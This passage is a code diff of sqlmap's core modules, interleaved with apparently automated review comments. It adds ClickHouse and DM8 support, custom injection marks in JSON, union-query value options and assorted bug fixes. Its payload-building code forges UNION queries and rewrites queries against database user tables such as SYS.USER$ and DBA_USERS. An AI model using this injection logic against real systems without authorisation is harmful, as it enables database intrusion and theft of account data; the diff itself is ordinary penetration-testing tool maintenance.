plugins.dbms.clickhouse import ClickHouseMap from plugins.dbms.cratedb.connector import Connector as CrateDBConn from plugins.dbms.cratedb import CrateDBMap from plugins.dbms.cubrid.connector import Connector as CubridConn 
@@ -122,6 +125,7 @@ def setHandler(): (DBMS.PRESTO, PRESTO_ALIASES, PrestoMap, PrestoConn), (DBMS.ALTIBASE, ALTIBASE_ALIASES, AltibaseMap, AltibaseConn), (DBMS.MIMERSQL, MIMERSQL_ALIASES, MimerSQLMap, MimerSQLConn), + (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES, ClickHouseMap, ClickHouseConn), (DBMS.CRATEDB, CRATEDB_ALIASES, CrateDBMap, CrateDBConn), (DBMS.CUBRID, CUBRID_ALIASES, CubridMap, CubridConn), (DBMS.CACHE, CACHE_ALIASES, CacheMap, CacheConn), diff --git a/lib/core/__init__.py b/lib/core/__init__.py index 9daf7bb7372..ba25c56a216 100644 --- a/lib/core/__init__.py +++ b/lib/core/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/agent.py b/lib/core/agent.py index 2e4321e4302..a9034f744c8 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -45,6 +45,7 @@ from lib.core.settings import BOUNDED_BASE64_MARKER from lib.core.settings import BOUNDARY_BACKSLASH_MARKER from lib.core.settings import BOUNDED_INJECTION_MARKER +from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR from lib.core.settings import DEFAULT_COOKIE_DELIMITER from lib.core.settings import DEFAULT_GET_POST_DELIMITER from lib.core.settings import GENERIC_SQL_COMMENT 
@@ -129,10 +130,12 @@ def payload(self, place=None, parameter=None, value=None, newValue=None, where=N if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML): origValue = re.split(r"['\">]", origValue)[-1] elif kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE): - origValue = extractRegexResult(r"(?s)\"\s*:\s*(?P\d+\Z)", origValue) or extractRegexResult(r'(?s)[\s:]*(?P[^"\[,]+\Z)', origValue) + match = re.search(r"['\"]", origValue) + quote = match.group(0) if match else '"' + origValue = extractRegexResult(r"%s\s*:\s*(?P\d+)\Z" % quote, origValue) or extractRegexResult(r"(?P[^%s]*)\Z" % quote, origValue) else: _ = extractRegexResult(r"(?s)(?P[^\s<>{}();'\"&]+\Z)", origValue) or "" - origValue = _.split('=', 1)[1] if '=' in _ else "" + origValue = _.split('=', 1)[1] if '=' in _ else _ elif place == PLACE.CUSTOM_HEADER: paramString = origValue origValue = origValue[origValue.find(',') + 1:] @@ -183,6 +186,11 @@ def payload(self, place=None, parameter=None, value=None, newValue=None, where=N newValue = newValue.replace(BOUNDARY_BACKSLASH_MARKER, '\\') newValue = self.adjustLateValues(newValue) + # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5488 + if kb.customInjectionMark in origValue: + payload = newValue.replace(origValue, "") + newValue = origValue.replace(kb.customInjectionMark, payload) + # TODO: support for POST_HINT newValue = "%s%s%s" % (BOUNDED_BASE64_MARKER, newValue, BOUNDED_BASE64_MARKER) 
@@ -194,9 +202,9 @@ def payload(self, place=None, parameter=None, value=None, newValue=None, where=N if place in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER): _ = "%s%s" % (origValue, kb.customInjectionMark) - if kb.postHint == POST_HINT.JSON and not isNumber(newValue) and '"%s"' % _ not in paramString: + if kb.postHint == POST_HINT.JSON and isNumber(origValue) and not isNumber(newValue) and '"%s"' % _ not in paramString: newValue = '"%s"' % self.addPayloadDelimiters(newValue) - elif kb.postHint == POST_HINT.JSON_LIKE and not isNumber(newValue) and re.search(r"['\"]%s['\"]" % re.escape(_), paramString) is None: + elif kb.postHint == POST_HINT.JSON_LIKE and isNumber(origValue) and not isNumber(newValue) and re.search(r"['\"]%s['\"]" % re.escape(_), paramString) is None: newValue = "'%s'" % self.addPayloadDelimiters(newValue) else: newValue = self.addPayloadDelimiters(newValue) @@ -220,7 +228,8 @@ def payload(self, place=None, parameter=None, value=None, newValue=None, where=N def _(pattern, repl, string): retVal = string match = None - for match in re.finditer(pattern, string): + + for match in re.finditer(pattern, string or ""): pass if match: @@ -398,7 +407,7 @@ def adjustLateValues(self, payload): """ if payload: - for match in re.finditer(r"%s(.*?)%s" % (BOUNDED_BASE64_MARKER, BOUNDED_BASE64_MARKER), payload): + for match in re.finditer(r"(?s)%s(.*?)%s" % (BOUNDED_BASE64_MARKER, BOUNDED_BASE64_MARKER), payload): _ = encodeBase64(match.group(1), binary=False, encoding=conf.encoding or UNICODE_ENCODING, safe=conf.base64Safe) payload = payload.replace(match.group(0), _) 
@@ -415,6 +424,16 @@ def adjustLateValues(self, payload): payload = re.sub(r"(?i)\bORD\(", "ASCII(", payload) payload = re.sub(r"(?i)\bMID\(", "SUBSTR(", payload) payload = re.sub(r"(?i)\bNCHAR\b", "CHAR", payload) + elif hashDBRetrieve(HASHDB_KEYS.DBMS_FORK) in (FORK.DM8,): + payload = re.sub(r"(?i)\bSUBSTRC\(", "SUBSTR(", payload) + if "SYS.USER$" in payload: + payload = re.sub(r"(?i)\bSYS.USER\$", "DBA_USERS", payload) + payload = re.sub(r"(?i)\bNAME\b", "USERNAME", payload) + + # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5057 + match = re.search(r"(=0x)(303a303a)3(\d{2,})", payload) + if match: + payload = payload.replace(match.group(0), "%s%s%s" % (match.group(1), match.group(2).upper(), "".join("3%s" % _ for _ in match.group(3)))) return payload @@ -482,7 +501,7 @@ def nullAndCastField(self, field): if field and Backend.getIdentifiedDbms(): rootQuery = queries[Backend.getIdentifiedDbms()] - if field.startswith("(CASE") or field.startswith("(IIF") or conf.noCast: + if field.startswith("(CASE") or field.startswith("(IIF") or conf.noCast and not (field.startswith("COUNT(") and Backend.getIdentifiedDbms() == DBMS.MSSQL): nulledCastedField = field else: if not (Backend.isDbms(DBMS.SQLITE) and not isDBMSVersionAtLeast('3')): @@ -574,7 +593,7 @@ def getFields(self, query): """ prefixRegex = r"(?:\s+(?:FIRST|SKIP|LIMIT(?: \d+)?)\s+\d+)*" - fieldsSelectTop = re.search(r"\ASELECT\s+TOP(\s+[\d]|\s*\([^)]+\))\s+(.+?)\s+FROM", query, re.I) + fieldsSelectTop = re.search(r"\ASELECT\s+TOP(\s+\d+|\s*\([^)]+\))\s+(.+?)\s+FROM", query, re.I) fieldsSelectRownum = re.search(r"\ASELECT\s+([^()]+?),\s*ROWNUM AS LIMIT FROM", query, re.I) fieldsSelectDistinct = re.search(r"\ASELECT%s\s+DISTINCT\((.+?)\)\s+FROM" % prefixRegex, query, re.I) fieldsSelectCase = re.search(r"\ASELECT%s\s+(\(CASE WHEN\s+.+\s+END\))" % prefixRegex, query, re.I) 
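Review bot: In the new DM8 branch of `adjustLateValues` the dot in `r"(?i)\bSYS.USER\$"` is unescaped, so it matches any character between `SYS` and `USER$`; it should read `re.sub(r"(?i)\bSYS\.USER\$", "DBA_USERS", payload)`. The guard `"SYS.USER$" in payload` is case-sensitive while both substitutions are case-insensitive, so a lower-cased payload skips the rewrite entirely. The following `\bNAME\b` replacement rewrites every standalone `NAME` token in the payload, not only the column of that table, which deserves a comment if it is intentional. The function body starts before this hunk.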
@@ -589,6 +608,9 @@ def getFields(self, query): if not _: fieldsSelectFrom = None + if re.search(r"\bWHERE\b.+(MIN|MAX)", query, re.I): + fieldsMinMaxstr = None + fieldsToCastStr = fieldsNoSelect if fieldsSubstr: @@ -722,7 +744,7 @@ def concatQuery(self, query, unpack=True): concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'+" % kb.chars.start, 1) concatenatedQuery += "+'%s'" % kb.chars.stop elif fieldsSelectTop: - topNum = re.search(r"\ASELECT\s+TOP(\s+[\d]|\s*\([^)]+\))\s+", concatenatedQuery, re.I).group(1) + topNum = re.search(r"\ASELECT\s+TOP(\s+\d+|\s*\([^)]+\))\s+", concatenatedQuery, re.I).group(1) concatenatedQuery = concatenatedQuery.replace("SELECT TOP%s " % topNum, "TOP%s '%s'+" % (topNum, kb.chars.start), 1) concatenatedQuery = concatenatedQuery.replace(" FROM ", "+'%s' FROM " % kb.chars.stop, 1) elif fieldsSelectCase: @@ -874,11 +896,16 @@ def forgeUnionQuery(self, query, position, count, comment, prefix, suffix, char, if element > 0: unionQuery += ',' - if element == position: + if conf.uValues and conf.uValues.count(',') + 1 == count: + unionQuery += conf.uValues.split(',')[element] + elif element == position: unionQuery += query else: unionQuery += char + if conf.uValues: + unionQuery = unionQuery.replace(CUSTOM_INJECTION_MARK_CHAR, query) + if fromTable and not unionQuery.endswith(fromTable): unionQuery += fromTable 
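Review bot: The new check in `getFields`, `re.search(r"\bWHERE\b.+(MIN|MAX)", query, re.I)`, has no word boundary or opening parenthesis around `MIN|MAX`, so any text after `WHERE` that merely contains those letters (for example a literal such as `'admin'`) also resets `fieldsMinMaxstr`. If the intent is to detect an aggregate call inside the WHERE clause, `r"\bWHERE\b.+\b(MIN|MAX)\s*\("` expresses it more tightly. A one-line comment saying why the MIN/MAX handling is disabled in that case would help, since the reason is not visible here. `getFields` begins and continues outside the hunk.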
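Review bot: In `forgeUnionQuery` the per-column substitution is guarded by `conf.uValues.count(',') + 1 == count`, but the later `unionQuery.replace(CUSTOM_INJECTION_MARK_CHAR, query)` runs whenever `conf.uValues` is set. With a mismatched column count the values are ignored, yet the replace is still applied to the whole string built so far, including the already inserted `query` and whatever precedes it, so any occurrence of the mark character there is replaced as well. Guarding the replace with the same condition, `if conf.uValues and conf.uValues.count(',') + 1 == count:`, keeps the two steps consistent. Splitting on a bare `,` also miscounts values that themselves contain commas, which is worth a comment. The function starts and ends outside the hunk.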
@@ -1009,16 +1036,16 @@ def limitQuery(self, num, query, field=None, uniqueField=None): fromFrom = limitedQuery[fromIndex + 1:] orderBy = None - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CUBRID, DBMS.EXTREMEDB, DBMS.RAIMA): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CUBRID, DBMS.EXTREMEDB, DBMS.DERBY): limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1) limitedQuery += " %s" % limitStr - elif Backend.getIdentifiedDbms() in (DBMS.ALTIBASE,): - limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num + 1, 1) + elif Backend.getIdentifiedDbms() in (DBMS.H2, DBMS.CRATEDB, DBMS.CLICKHOUSE): + limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (1, num) limitedQuery += " %s" % limitStr - elif Backend.getIdentifiedDbms() in (DBMS.DERBY, DBMS.CRATEDB): - limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (1, num) + elif Backend.getIdentifiedDbms() in (DBMS.ALTIBASE,): + limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num + 1, 1) limitedQuery += " %s" % limitStr elif Backend.getIdentifiedDbms() in (DBMS.FRONTBASE, DBMS.VIRTUOSO): diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py index 52fc2227fd5..5741b2e61ac 100644 --- a/lib/core/bigarray.py +++ b/lib/core/bigarray.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -14,6 +14,7 @@ import os import sys import tempfile +import threading import zlib from lib.core.compat import xrange @@ -65,6 +66,8 @@ class BigArray(list): >>> _ = _ + [1] >>> _[-1] 1 + >>> len([_ for _ in BigArray(xrange(100000))]) + 100000 """ def __init__(self, items=None): 
@@ -72,6 +75,7 @@ def __init__(self, items=None): self.chunk_length = sys.maxsize self.cache = None self.filenames = set() + self._lock = threading.Lock() self._os_remove = os.remove self._size_counter = 0 @@ -93,18 +97,19 @@ def __iadd__(self, value): return self def append(self, value): - self.chunks[-1].append(value) + with self._lock: + self.chunks[-1].append(value) - if self.chunk_length == sys.maxsize: - self._size_counter += _size_of(value) - if self._size_counter >= BIGARRAY_CHUNK_SIZE: - self.chunk_length = len(self.chunks[-1]) - self._size_counter = None + if self.chunk_length == sys.maxsize: + self._size_counter += _size_of(value) + if self._size_counter >= BIGARRAY_CHUNK_SIZE: + self.chunk_length = len(self.chunks[-1]) + self._size_counter = None - if len(self.chunks[-1]) >= self.chunk_length: - filename = self._dump(self.chunks[-1]) - self.chunks[-1] = filename - self.chunks.append([]) + if len(self.chunks[-1]) >= self.chunk_length: + filename = self._dump(self.chunks[-1]) + self.chunks[-1] = filename + self.chunks.append([]) def extend(self, value): for _ in value: @@ -130,6 +135,17 @@ def index(self, value): return ValueError, "%s is not in list" % value + def close(self): + while self.filenames: + filename = self.filenames.pop() + try: + self._os_remove(filename) + except OSError: + pass + + def __del__(self): + self.close() + def _dump(self, chunk): try: handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.BIG_ARRAY) @@ -168,8 +184,12 @@ def __setstate__(self, state): self.chunks, self.filenames = state def __getitem__(self, y): + length = len(self) + if length == 0: + raise IndexError("BigArray index out of range") + while y < 0: - y += len(self) + y += length index = y // self.chunk_length offset = y % self.chunk_length 
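Review bot: `close()` pops each name before calling `self._os_remove(filename)` and swallows every `OSError`, so a chunk file that could not be deleted is forgotten and stays in the temporary directory with whatever rows were dumped into it. Since `__del__` now calls `close()`, an instance restored through `__setstate__` with the same `filenames` would presumably lose its chunk files once the other copy is collected; a short comment on `close()` stating which object owns the files would help. The context line just above, `return ValueError, "%s is not in list" % value`, returns a tuple where `raise ValueError("%s is not in list" % value)` is meant.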
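Review bot: In `__getitem__` the empty-array guard stops the endless loop, but `while y < 0: y += length` still wraps an index below `-length` around to a valid position instead of rejecting it. A single adjustment followed by a range check matches list semantics: `if y < 0: y += length` and then `if y < 0: raise IndexError("BigArray index out of range")`. The rest of the method, including any upper-bound handling, lies outside this hunk.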
@@ -198,7 +218,10 @@ def __repr__(self): def __iter__(self): for i in xrange(len(self)): - yield self[i] + try: + yield self[i] + except IndexError: + break def __len__(self): return len(self.chunks[-1]) if len(self.chunks) == 1 else (len(self.chunks) - 1) * self.chunk_length + len(self.chunks[-1]) diff --git a/lib/core/common.py b/lib/core/common.py index a6d9acaadb0..d54dd1b8c3e 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -35,6 +35,7 @@ import time import types import unicodedata +import zlib from difflib import SequenceMatcher from math import sqrt @@ -104,6 +105,7 @@ from lib.core.optiondict import optDict from lib.core.settings import BANNER from lib.core.settings import BOLD_PATTERNS +from lib.core.settings import BOUNDARY_BACKSLASH_MARKER from lib.core.settings import BOUNDED_INJECTION_MARKER from lib.core.settings import BRUTE_DOC_ROOT_PREFIXES from lib.core.settings import BRUTE_DOC_ROOT_SUFFIXES @@ -128,13 +130,14 @@ from lib.core.settings import GENERIC_DOC_ROOT_DIRECTORY_NAMES from lib.core.settings import GIT_PAGE from lib.core.settings import GITHUB_REPORT_OAUTH_TOKEN -from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_PREFIX +from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_REGEX from lib.core.settings import HASHDB_MILESTONE_VALUE from lib.core.settings import HOST_ALIASES from lib.core.settings import HTTP_CHUNKED_SPLIT_KEYWORDS from lib.core.settings import IGNORE_PARAMETERS from lib.core.settings import IGNORE_SAVE_OPTIONS from lib.core.settings import INFERENCE_UNKNOWN_CHAR +from lib.core.settings import INJECT_HERE_REGEX from lib.core.settings import IP_ADDRESS_REGEX from lib.core.settings import ISSUES_PAGE from lib.core.settings import IS_TTY 
@@ -251,6 +254,10 @@ def getDbms(versions=None): if versions is None and Backend.getVersionList(): versions = Backend.getVersionList() + # NOTE: preventing ugly (e.g.) "back-end DBMS: MySQL Unknown" + if isListLike(versions) and UNKNOWN_DBMS_VERSION in versions: + versions = None + return Backend.getDbms() if versions is None else "%s %s" % (Backend.getDbms(), " and ".join(filterNone(versions))) @staticmethod @@ -350,7 +357,7 @@ def setDbms(dbms): elif kb.dbms is not None and kb.dbms != dbms: warnMsg = "there appears to be a high probability that " warnMsg += "this could be a false positive case" - logger.warn(warnMsg) + logger.warning(warnMsg) msg = "sqlmap previously fingerprinted back-end DBMS as " msg += "%s. However now it has been fingerprinted " % kb.dbms @@ -370,7 +377,7 @@ def setDbms(dbms): break else: warnMsg = "invalid value" - logger.warn(warnMsg) + logger.warning(warnMsg) elif kb.dbms is None: kb.dbms = aliasToDbmsEnum(dbms) @@ -428,7 +435,7 @@ def setOs(os): break else: warnMsg = "invalid value" - logger.warn(warnMsg) + logger.warning(warnMsg) elif kb.os is None and isinstance(os, six.string_types): kb.os = os.capitalize() @@ -465,7 +472,7 @@ def setArch(): break else: warnMsg = "invalid value. Valid values are 1 and 2" - logger.warn(warnMsg) + logger.warning(warnMsg) return kb.arch @@ -589,11 +596,14 @@ def isVersionWithin(versionList): def isVersionGreaterOrEqualThan(version): retVal = False - if Backend.getVersion() is not None and version is not None: + if all(_ not in (None, UNKNOWN_DBMS_VERSION) for _ in (Backend.getVersion(), version)): + _version = unArrayizeValue(Backend.getVersion()) + _version = re.sub(r"[<>= ]", "", _version) + try: - retVal = LooseVersion(Backend.getVersion()) >= LooseVersion(version) + retVal = LooseVersion(_version) >= LooseVersion(version) except: - retVal = str(Backend.getVersion()) >= str(version) + retVal = str(_version) >= str(version) return retVal 
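Review bot: In `isVersionGreaterOrEqualThan` the line `re.sub(r"[<>= ]", "", _version)` drops range markers from the fingerprinted version, so a value that was only an upper or lower bound is then compared as if it were the exact version, and the `>=` result can be true for a server that is actually older. The bare `except:` fallback compares the values as strings, which orders `"10"` before `"9"`. I would add `# NOTE: '<' and '>' markers are dropped, so a bound is compared as if it were the exact version` above the substitution and narrow the handler to `except Exception:`.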
@@ -653,13 +663,13 @@ def paramToDict(place, parameters=None): if not conf.multipleTargets and not (conf.csrfToken and re.search(conf.csrfToken, parameter, re.I)): _ = urldecode(testableParameters[parameter], convall=True) - if (_.endswith("'") and _.count("'") == 1 or re.search(r'\A9{3,}', _) or re.search(r'\A-\d+\Z', _) or re.search(DUMMY_USER_INJECTION, _)) and not parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX): + if (_.endswith("'") and _.count("'") == 1 or re.search(r'\A9{3,}', _) or re.search(r'\A-\d+\Z', _) or re.search(DUMMY_USER_INJECTION, _)) and not re.search(GOOGLE_ANALYTICS_COOKIE_REGEX, parameter): warnMsg = "it appears that you have provided tainted parameter values " warnMsg += "('%s') with most likely leftover " % element warnMsg += "chars/statements from manual SQL injection test(s). " warnMsg += "Please, always use only valid parameter values " warnMsg += "so sqlmap could be able to run properly" - logger.warn(warnMsg) + logger.warning(warnMsg) message = "are you really sure that you want to continue (sqlmap could have problems)? [y/N] " @@ -669,7 +679,7 @@ def paramToDict(place, parameters=None): warnMsg = "provided value for parameter '%s' is empty. " % parameter warnMsg += "Please, always use only valid parameter values " warnMsg += "so sqlmap could be able to run properly" - logger.warn(warnMsg) + logger.warning(warnMsg) if place in (PLACE.POST, PLACE.GET): for regex in (r"\A((?:<[^>]+>)+\w+)((?:<[^>]+>)+)\Z", r"\A([^\w]+.*\w+)([^\w]+)\Z"): 
@@ -703,8 +713,16 @@ def walk(head, current=None): if value: walk(head, value) - deserialized = json.loads(testableParameters[parameter]) - walk(deserialized) + # NOTE: for cases with custom injection marker(s) inside (e.g. https://github.com/sqlmapproject/sqlmap/issues/4137#issuecomment-2013783111) - p.s. doesn't care too much about the structure (e.g. injection into the flat array values) + if CUSTOM_INJECTION_MARK_CHAR in testableParameters[parameter]: + for match in re.finditer(r'(\w+)[^\w]*"\s*:[^\w]*\w*%s' % re.escape(CUSTOM_INJECTION_MARK_CHAR), testableParameters[parameter]): + key = match.group(1) + value = testableParameters[parameter].replace(match.group(0), match.group(0).replace(CUSTOM_INJECTION_MARK_CHAR, BOUNDED_INJECTION_MARKER)) + candidates["%s (%s)" % (parameter, key)] = re.sub(r"\b(%s\s*=\s*)%s" % (re.escape(parameter), re.escape(testableParameters[parameter])), r"\g<1>%s" % value, parameters) + + if not candidates: + deserialized = json.loads(testableParameters[parameter]) + walk(deserialized) if candidates: message = "it appears that provided value for %sparameter '%s' " % ("%s " % place if place != parameter else "", parameter) @@ -734,7 +752,7 @@ def walk(head, current=None): if len(conf.testParameter) > 1: warnMsg = "provided parameters '%s' " % paramStr warnMsg += "are not inside the %s" % place - logger.warn(warnMsg) + logger.warning(warnMsg) else: parameter = conf.testParameter[0] @@ -759,7 +777,7 @@ def walk(head, current=None): if len(decoded) > MIN_ENCODED_LEN_CHECK and all(_ in getBytes(string.printable) for _ in decoded): warnMsg = "provided parameter '%s' " % parameter warnMsg += "appears to be '%s' encoded" % encoding - logger.warn(warnMsg) + logger.warning(warnMsg) break except: pass @@ -810,7 +828,7 @@ def getManualDirectories(): else: warnMsg = "unable to automatically retrieve the web server " warnMsg += "document root" - logger.warn(warnMsg) + logger.warning(warnMsg) directories = [] 
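Review bot: The new custom-mark branch in `paramToDict` passes `r"\g<1>%s" % value` as the replacement template of `re.sub`, and `value` is raw request JSON, so backslash sequences in it are interpreted by the regex engine: `\n` becomes a newline, `\\` collapses, and `\u....` raises an error on current Python 3. A callable replacement avoids this: `re.sub(pattern, lambda m: "%s%s" % (m.group(1), value), parameters)`. The `finditer` pattern also recognises only double-quoted keys, which is worth stating in the NOTE comment next to it. The function begins before the hunk and continues after it.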
@@ -876,7 +894,7 @@ def getManualDirectories(): def getAutoDirectories(): """ >>> pushValue(kb.absFilePaths) - >>> kb.absFilePaths = ["C:\\inetpub\\wwwroot\\index.asp", "/var/www/html"] + >>> kb.absFilePaths = [r"C:\\inetpub\\wwwroot\\index.asp", "/var/www/html"] >>> getAutoDirectories() ['C:/inetpub/wwwroot', '/var/www/html'] >>> kb.absFilePaths = popValue() @@ -896,7 +914,7 @@ def getAutoDirectories(): retVal.add(directory) else: warnMsg = "unable to automatically parse any web server path" - logger.warn(warnMsg) + logger.warning(warnMsg) return list(retVal) @@ -1025,10 +1043,15 @@ def dataToStdout(data, forceOutput=False, bold=False, contentType=None, status=C sys.stdout.write(stdoutEncode(clearColors(data)), status, contentType) else: sys.stdout.write(stdoutEncode(setColor(data, bold=bold) if coloring else clearColors(data))) - - sys.stdout.flush() except IOError: pass + except UnicodeEncodeError: + sys.stdout.write(re.sub(r"[^ -~]", '?', clearColors(data))) + finally: + try: + sys.stdout.flush() + except IOError: + raise SystemExit if multiThreadMode: logging._releaseLock() @@ -1312,7 +1335,10 @@ def isZipFile(filename): checkFile(filename) - return openFile(filename, "rb", encoding=None).read(len(ZIP_HEADER)) == ZIP_HEADER + with openFile(filename, "rb", encoding=None) as f: + header = f.read(len(ZIP_HEADER)) + + return header == ZIP_HEADER def isDigit(value): """ 
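Review bot: The `UnicodeEncodeError` fallback in `dataToStdout` uses `re.sub(r"[^ -~]", '?', ...)`, which also replaces newlines, carriage returns and tabs with `?`, so multi-line output collapses into one line; `r"[^\t\r\n -~]"` keeps the layout. The fallback `sys.stdout.write` sits inside an `except` clause, so an `IOError` raised there is not handled by the sibling handler. `raise SystemExit` in the `finally` block runs before `logging._releaseLock()`; if the matching acquire happened earlier in the function (outside this hunk), other threads would be left waiting on that lock.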
@@ -1379,6 +1405,38 @@ def banner(): dataToStdout(result, forceOutput=True) +def parseJson(content): + """ + This function parses POST_HINT.JSON and POST_HINT.JSON_LIKE content + + >>> parseJson("{'id':1}")["id"] == 1 + True + >>> parseJson('{"id":1}')["id"] == 1 + True + """ + + quote = None + retVal = None + + for regex in (r"'[^']+'\s*:", r'"[^"]+"\s*:'): + match = re.search(regex, content) + if match: + quote = match.group(0)[0] + + try: + if quote == '"': + retVal = json.loads(content) + elif quote == "'": + content = content.replace('"', '\\"') + content = content.replace("\\'", BOUNDARY_BACKSLASH_MARKER) + content = content.replace("'", '"') + content = content.replace(BOUNDARY_BACKSLASH_MARKER, "'") + retVal = json.loads(content) + except: + pass + + return retVal + def parsePasswordHash(password): """ In case of Microsoft SQL Server password hash value is expanded to its components @@ -1428,6 +1486,19 @@ def cleanQuery(query): return retVal +def cleanReplaceUnicode(value): + """ + Cleans unicode for proper encode/decode + + >>> cleanReplaceUnicode(['a', 'b']) + ['a', 'b'] + """ + + def clean(value): + return value.encode(UNICODE_ENCODING, errors="replace").decode(UNICODE_ENCODING) if isinstance(value, six.text_type) else value + + return applyFunctionRecursively(value, clean) + def setPaths(rootPath): """ Sets absolute paths for project directories and files @@ -1454,6 +1525,7 @@ def setPaths(rootPath): paths.COMMON_FILES = os.path.join(paths.SQLMAP_TXT_PATH, "common-files.txt") paths.COMMON_TABLES = os.path.join(paths.SQLMAP_TXT_PATH, "common-tables.txt") paths.COMMON_OUTPUTS = os.path.join(paths.SQLMAP_TXT_PATH, 'common-outputs.txt') + paths.DIGEST_FILE = os.path.join(paths.SQLMAP_TXT_PATH, "sha256sums.txt") paths.SQL_KEYWORDS = os.path.join(paths.SQLMAP_TXT_PATH, "keywords.txt") paths.SMALL_DICT = os.path.join(paths.SQLMAP_TXT_PATH, "smalldict.txt") paths.USER_AGENTS = os.path.join(paths.SQLMAP_TXT_PATH, "user-agents.txt") 
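Review bot: `parseJson` wraps both `json.loads` calls in a bare `except: pass`, which also swallows `KeyboardInterrupt` and `SystemExit` raised while parsing a large body; `except ValueError:` covers the decode failures on both Python lines. The quote-detection loop has no `break`, so when both patterns match the double-quote form always wins, and a single-quoted document containing a `"key":` substring in a value is parsed as strict JSON and returns `None`. The docstring should say that `None` means "could not be parsed" and that the single-quote rewrite is a heuristic, not a full parser.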
@@ -1521,6 +1593,12 @@ def parseTargetDirect(): 'testdb' >>> conf.dbmsPass 'testpass' + >>> conf.direct = "mysql://user:'P@ssw0rd'@127.0.0.1:3306/test" + >>> parseTargetDirect() + >>> conf.dbmsPass + 'P@ssw0rd' + >>> conf.hostname + '127.0.0.1' >>> conf.direct = popValue() """ @@ -1537,8 +1615,8 @@ def parseTargetDirect(): conf.dbms = details.group("dbms") if details.group("credentials"): - conf.dbmsUser = details.group("user") - conf.dbmsPass = details.group("pass") + conf.dbmsUser = details.group("user").strip("'\"") + conf.dbmsPass = details.group("pass").strip("'\"") else: if conf.dbmsCred: conf.dbmsUser, conf.dbmsPass = conf.dbmsCred.split(':') @@ -1580,7 +1658,7 @@ def parseTargetDirect(): if remote: warnMsg = "direct connection over the network for " warnMsg += "%s DBMS is not supported" % dbmsName - logger.warn(warnMsg) + logger.warning(warnMsg) conf.hostname = "localhost" conf.port = 0 @@ -1709,7 +1787,7 @@ def parseTargetUrl(): errMsg = "invalid target URL port (%d)" % conf.port raise SqlmapSyntaxException(errMsg) - conf.url = getUnicode("%s://%s:%d%s" % (conf.scheme, ("[%s]" % conf.hostname) if conf.ipv6 else conf.hostname, conf.port, conf.path)) + conf.url = getUnicode("%s://%s%s%s" % (conf.scheme, ("[%s]" % conf.hostname) if conf.ipv6 else conf.hostname, (":%d" % conf.port) if not (conf.port == 80 and conf.scheme == "http" or conf.port == 443 and conf.scheme == "https") else "", conf.path)) conf.url = conf.url.replace(URI_QUESTION_MARKER, '?') if urlSplit.query: @@ -1762,7 +1840,7 @@ def expandAsteriskForColumns(expression): the SQL query string (expression) """ - match = re.search(r"(?i)\ASELECT(\s+TOP\s+[\d]+)?\s+\*\s+FROM\s+((`[^`]+`|[^\s]+)+)", expression) + match = re.search(r"(?i)\ASELECT(\s+TOP\s+[\d]+)?\s+\*\s+FROM\s+(([`'\"][^`'\"]+[`'\"]|[\w.]+)+)(\s|\Z)", expression) if match: infoMsg = "you did not provide the fields in your query. " 
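Review bot: In `parseTargetDirect`, `.strip("'\"")` removes any run of either quote character from both ends of the user name and password, so a credential that legitimately begins or ends with a quote, or is wrapped in mismatched quotes, is silently altered and the connection then fails with a wrong password. Stripping only one matching pair is safer, e.g. `if value[:1] == value[-1:] and value[:1] in ("'", '"'): value = value[1:-1]`. The docstring example covers only the well-formed quoted case; the regex that fills `details` is outside this hunk, so how quotes interact with `:` and `@` inside the password cannot be judged here.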
